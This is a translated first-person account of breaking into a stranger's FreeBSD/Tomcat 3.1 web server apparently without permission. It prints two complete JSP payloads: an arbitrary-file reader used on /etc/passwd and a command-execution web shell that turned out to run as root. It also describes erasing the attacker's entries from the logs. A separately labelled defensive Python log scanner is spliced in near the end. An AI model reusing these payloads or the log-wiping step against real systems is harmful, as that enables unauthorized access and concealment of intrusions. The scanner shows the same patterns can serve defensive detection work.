This article describes how I obtained root on a FreeBSD 4.0 host by attacking it through the web.
It is written for educational purposes; I hope readers do not use the methods and programs in it to harm network security.
Author: lovehacker
Contact: lovehacker@263.net
Website: http://www.chinansl.com
Copyright: all rights reserved. Reprinting is allowed, but the article must be kept intact.
By chance I came across a website whose pages were fresh and pleasant to look at. The site was built with JSP, and out of personal interest I decided to take a look at the security of the system.
    telnet www.target.com 8080
    GET /chinansl HTTP/1.1
    [Enter]
    [Enter]
The response came back as follows:
    HTTP/1.0 404 Not Found
    Date: Sun, 08 Jul 2001 07:49:13 GMT
    Servlet-Engine: Tomcat Web Server/3.1 (JSP 1.1; Servlet 2.2; Java 1.2.2; Linux 2.2.12 i386; java.vendor=Blackdown Java-Linux Team)
    Content-Language: en
    Content-Type: text/html
    Status: 404
So the web server is Tomcat 3.1. I remembered that I had found a vulnerability in this version and posted it to Bugtraq.
Roughly: using ".." one could step out of the web directory. So I tried:
    http://target:8080/../../../..%00.jsp (no)
    http://target:8080/file/index.jsp (no)
    http://target:8080/index.jsp (no)
    http://target:8080/index.jsp%81 (no)
    http://target:8080/index.js%70 (no)
    http://target:8080/index.jsp%2581 (no)
    http://target:8080/WEB-INF/ (no)
Well, let's try something else. Tomcat 3.1 ships with a management tool that lets you view the directories and files under the web root and add contexts. Try:
    http://target:8080/admin/
The administrator had neither deleted this directory nor disabled access to it :-( Mistake!!!!!
I clicked the "View All Context" button, which listed some of the files and directories under the web root. Going through them carefully, I discovered a file-upload component. Heh heh, time to write a JSP file.
After a few sips of coffee I had written something like this:
    <%@ page import="java.io.*" %>
    <%
    // Read the file named by the "file" parameter and echo it line by line.
    String file = request.getParameter("file");
    String str = "";
    FileInputStream fis = null;
    DataInputStream dis = null;
    try {
        fis = new FileInputStream(file);
        dis = new DataInputStream(fis);
        while (true) {
            try {
                str = dis.readLine();
            } catch (Exception e) {}
            if (str == null) break;
            out.print(str + "\n");
        }
    } catch (IOException e) {}
    %>
I uploaded this JSP into the target's web directory through the upload component, then requested:
    http://target:8080/upload/test.jsp?file=/etc/passwd
Hey, the password file came out. I only looked at /etc/passwd and not at /etc/shadow, because I assumed the web server was started as nobody, as usual. (Mistake.)
What followed was the tedious business of guessing passwords, without success. Forget it. Anyway, I now effectively had a shell; if I couldn't guess the password, IE would be my shell environment!
I wrote another one:
    <%@ page import="java.io.*" %>
    <%
    // Run the command given in the "cmd" parameter and echo its stdout.
    try {
        String cmd = request.getParameter("cmd");
        Process child = Runtime.getRuntime().exec(cmd);
        InputStream in = child.getInputStream();
        int c;
        while ((c = in.read()) != -1) {
            out.print((char) c);
        }
        in.close();
        try {
            child.waitFor();
        } catch (InterruptedException e) {
            e.printStackTrace();
        }
    } catch (IOException e) {
        System.err.println(e);
    }
    %>
I uploaded this JSP through the upload component too, and now I had a shell:
    http://target:8080/upload/cmd.jsp?cmd=ls -la /
(Output not listed here.)
How to get root? After some searching I found that MySQL was installed on the system, and I got the MySQL password from a JSP :) Let's see how MySQL is running:
    http://target:8080/upload/cmd.jsp?cmd=ps aux | grep mysqld
Output:
    root 87494 0.2 1.9 17300 4800 p0- S 28Jun01 5:54.72 /usr/local/data/mysql
Oh, there's a way. MySQL is running as root and I know the MySQL password, so I could write a shell program, create a table, put my data into the table, and then use "SELECT ... INTO OUTFILE" to create a file on the system so that my program runs when a user executes su. (Remember the apache.org intrusion? The hacker used this approach.) Then I would upload the program, run it, get the nobody permissions, and then ... when someone ran su root, the setuid shell it created would make me root.
Oh, a good plan; I was proud of my idea ...
What came next almost made me throw up:
I typed:
    http://target:8080/upload/cmd.jsp?cmd=id
Output:
    uid=0(root) gid=0(xxx) groups=0(xxx),2(xxx),3(xxx),20(xxx),31(xxx)
Damn, my web shell was already root. The administrator really took good care of me, and of himself too. It turned out I had been messing around for a whole day for nothing, hehe!
    http://target:8080/upload/cmd.jsp?cmd=ps aux
Sure enough, the web server was running as root (output not listed).
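As an added example (not from the original article), here is a small Python check a defender could run over a combined-format access log to flag the three request patterns this writeup relies on: hits on the Tomcat 3.1 /admin/ console, the encoded traversal probes tried above, and JSPs in a writable upload directory being called with file= or cmd= parameters. The log lines, the /upload/ directory name and the parameter names are constructed assumptions.

```python
"""Flag, in a combined-format access log, the request patterns this writeup walks through."""
import re
from urllib.parse import unquote_to_bytes, urlsplit, parse_qs

# Constructed sample lines (not from the original page).
SAMPLE_LOG = """\
10.0.0.5 - - [08/Jul/2001:07:49:13 +0000] "GET /chinansl HTTP/1.1" 404 0
10.0.0.5 - - [08/Jul/2001:07:50:02 +0000] "GET /index.jsp%2581 HTTP/1.1" 404 0
10.0.0.5 - - [08/Jul/2001:07:50:20 +0000] "GET /index.js%70 HTTP/1.1" 200 3100
10.0.0.5 - - [08/Jul/2001:07:50:40 +0000] "GET /../../../..%00.jsp HTTP/1.1" 404 0
10.0.0.5 - - [08/Jul/2001:07:51:10 +0000] "GET /admin/ HTTP/1.1" 200 2310
10.0.0.9 - - [08/Jul/2001:07:52:00 +0000] "GET /upload/test.jsp?file=/etc/passwd HTTP/1.1" 200 1422
10.0.0.9 - - [08/Jul/2001:07:53:30 +0000] "GET /upload/cmd.jsp?cmd=id HTTP/1.1" 200 61
10.0.0.7 - - [08/Jul/2001:08:00:00 +0000] "GET /news/index.jsp?id=12 HTTP/1.1" 200 5120
"""
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')
SHELL_PARAMS = {"cmd", "file"}   # parameter names used by the two JSPs in the writeup
UPLOAD_DIRS = (b"/upload/",)     # assumed writable web directory

def classify(target):
    """Return indicator names for one request target (path?query); empty if benign."""
    hits = []
    parts = urlsplit(target)
    once = unquote_to_bytes(parts.path)
    raw = unquote_to_bytes(once)   # second pass catches %2581 -> %81 -> byte 0x81
    if raw.startswith(b"/admin/") or raw == b"/admin":
        hits.append("tomcat-admin-console")
    if b"/../" in raw or b"\x00" in raw or any(b >= 0x80 for b in raw):
        hits.append("traversal-or-high-byte-probe")
    if once != parts.path.encode() and all(32 <= b < 127 for b in once):
        hits.append("percent-encoded-plain-ascii")   # e.g. /index.js%70
    params = set(parse_qs(parts.query, keep_blank_values=True))
    if raw.lower().endswith(b".jsp") and raw.startswith(UPLOAD_DIRS) and params & SHELL_PARAMS:
        hits.append("jsp-in-upload-dir-with-shell-param")
    return hits

def scan(log_text):
    """Return (ip, target, indicators) for every log line with at least one hit."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ip, _method, target, _status = m.groups()
            if (hits := classify(target)):
                findings.append((ip, target, hits))
    return findings

if __name__ == "__main__":
    for ip, target, hits in scan(SAMPLE_LOG):
        print(ip, target, "->", ", ".join(hits))
```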
What remained:
1. Delete my telnet records.
2. Delete the HTTP logs.
As for clearing the logs, the method I use is: cat xxx | grep -v "IP" >> temp, then overwrite the log files I had touched with temp.
I did not replace his pages, because I am not a hacker myself, nor a "red guest", just a network security enthusiast. So I e-mailed the system administrator!
Of course, I mentioned in the letter that if he needed AIL Information Technology to provide security services for him, we would be very happy to!